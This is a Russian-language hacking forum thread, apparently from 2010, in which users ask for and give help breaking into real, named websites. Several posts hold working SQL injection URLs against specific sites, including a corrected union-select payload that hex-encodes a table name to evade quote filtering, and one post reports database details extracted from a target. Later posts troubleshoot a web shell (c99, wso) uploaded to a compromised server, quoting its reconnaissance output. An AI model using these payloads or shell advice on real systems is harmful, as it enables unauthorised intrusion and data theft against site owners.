Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    не угaдал...он все правильно туда ставил и ось там была *никс...просто сайт раньше ломали и админ кое что в настройках сервера подправил...но хитрым способом это можно было обойти и в итоге шелл был залит.
     
  2. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    тогда что это за странная конструкция faq.php?cmd=dir?
     
    _________________________
  3. Samael91

    Samael91 New Member

    Joined:
    2 Dec 2010
    Messages:
    38
    Likes Received:
    0
    Reputations:
    0
    Народ, подскажите это PHP-inj или фрейм http://www.prodisney.ru/index.php?page=index.php и если это фрейм то что должно было быть при PHP-inj?
     
  4. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Смотрим сурс:
    Code:
    <frame src="index.php" name="right_frameset" frameborder="No">

    Фрейм - страница вставлена во фрейм
    Читалка - видешь сурс страница, в т.ч. и PHP.
    PHP-inject - это include('page.php'); PHP выучи хотябы а потом уже хацкери =\\
     
  5. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    человек не особо разбирается в никс коммандах....
     
  6. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Не получается вывести версию БД.

    http://www.vyo.org/index.php?events/action/show/id/event/yr/2010/mon/-12+union+select+1,2,version(),4,5,6,7,8,9+--+
     
  7. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274

    version: 5.0.54-log
    user: [email protected]
    database: dbvyoa


    писать в личку и дальше спрашивать как я получил это не следует..Я УГАДАЛ !!!
    ЗЫ. Вопросы по раскрутке уже задолбали
     
    3 people like this.
  8. toX1k

    toX1k New Member

    Joined:
    18 Sep 2010
    Messages:
    2
    Likes Received:
    0
    Reputations:
    -1
    http://engr.oregonstate.edu/oregonstater/citation.php?id=290+and+1=0+union+select+1,2,3,4,5 ,6,column_name,8,9,10,11 FROM INFORMATION_SCHEMA.columns where table_name='USER_PRIVILEGES' --

    как будет правильно составить запрос?
     
  9. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    toX1k
    могически_кавычке = on
    хекс юзай и почитай маны
    http://engr.oregonstate.edu/oregonstater/citation.php?id=290+and+1=0+union+select+1,2,3,4,5,6,column_name,8,9,10,11+FROM+INFORMATION_SCHEMA.columns+where+table_name=0x555345525F50524956494C45474553--
    P.S. пробелы убери
     
    #15669 ~d0s~, 19 Dec 2010
    Last edited: 19 Dec 2010
    1 person likes this.
  10. toX1k

    toX1k New Member

    Joined:
    18 Sep 2010
    Messages:
    2
    Likes Received:
    0
    Reputations:
    -1
    я так и подумал что кавычки фильтруются ('), аналога заменяющего их не нашёл
    сначала char() хотел заюзать, после передумал
     
  11. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    167
    Likes Received:
    38
    Reputations:
    18
    Залил шелл, захожу на него, но не отображается полностью
    [​IMG]
     
  12. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Залей другой шелл, видимо в настройках пхп на сервере отключена/неработает функция получения списка файлов в каталоге или приведи код шелла здесь
     
    _________________________
  13. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    167
    Likes Received:
    38
    Reputations:
    18
    Пробовал c99,wso, и n3t
    залил phpinfo(); все норм отобразилось!
     
  14. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Короче в связи с тем что ты очень мало даешь информации, остается только вариант угадать что у тебя случилось, если представить что на том сервере стоит BSD система, то естественно работать не будет, потому что c99 работает с realpath() которая не совместима с БСД системами. А вообще можно залить шелл например написанный на perl
     
    _________________________
  15. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,027
    Likes Received:
    311
    Reputations:
    86
    Посоветуйте шелл под БСД кстати.
    Uname?
    Кстати, шелл заливал не на Мастерхост?
     
    _________________________
  16. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    167
    Likes Received:
    38
    Reputations:
    18
    Server software: Apache/2.2
    Loaded Apache modules: core, itk, http_core, mod_so, mod_auth_basic, mod_authn_file, mod_authz_host, mod_authz_user, mod_authz_groupfile, mod_authz_default, mod_include, mod_log_config, mod_env, mod_expires, mod_headers, mod_setenvif, mod_mime, mod_status, mod_autoindex, mod_negotiation, mod_dir, mod_alias, mod_rewrite, mod_actions, mod_unique_id, mod_auth_mysql, mod_deflate, mod_nogzip, mod_rpaf-2, mod_php5
    Disabled PHP Functions: leak,posix_getpwuid,posix_getpwnam,posix_getgrid,posix_getgrnam,posix_getgroups
    cURL support: enabled
    Supported databases: MySql (5.0.77), MSSQL, PostgreSQL

    Readable /etc/passwd: yes [view]
    Readable /etc/shadow: no
    OS version: Linux version 2.6.32.21-grsec-6.mosso5.x86_64 ([email protected]) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-48)) #1 SMP Thu Oct 14 13:22:47 CDT 2010
    Distr name:
    Red Hat Enterprise Linux Server release 5.5 (Tikanga)
    Kernel \r on an \m

    Userful: gcc, cc, ld, make, php, tar, gzip, bzip2, nc, locate
    Danger: iptables
    Downloaders: wget, curl
     
  17. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    вообщем так прям и не скажешь отчего не работает пхп шелл, залей перл шелл
     
    _________________________
  18. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    167
    Likes Received:
    38
    Reputations:
    18
    А другие варианты есть какие-либо кроме perl шелла

    кстати через console - > list dir
    Отображает файлы и папки
     
  19. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    попробуй print_r(scandir('полный_путь_до_каталога'));
    если выведет список дир, тогда переделывать шелл придется, или найти тот который использует scandir
     
    _________________________
    2 people like this.
  20. I love this game

    I love this game Elder - Старейшина

    Joined:
    23 Dec 2008
    Messages:
    167
    Likes Received:
    38
    Reputations:
    18
    выдало, как переделать?
     
Thread Status:
Not open for further replies.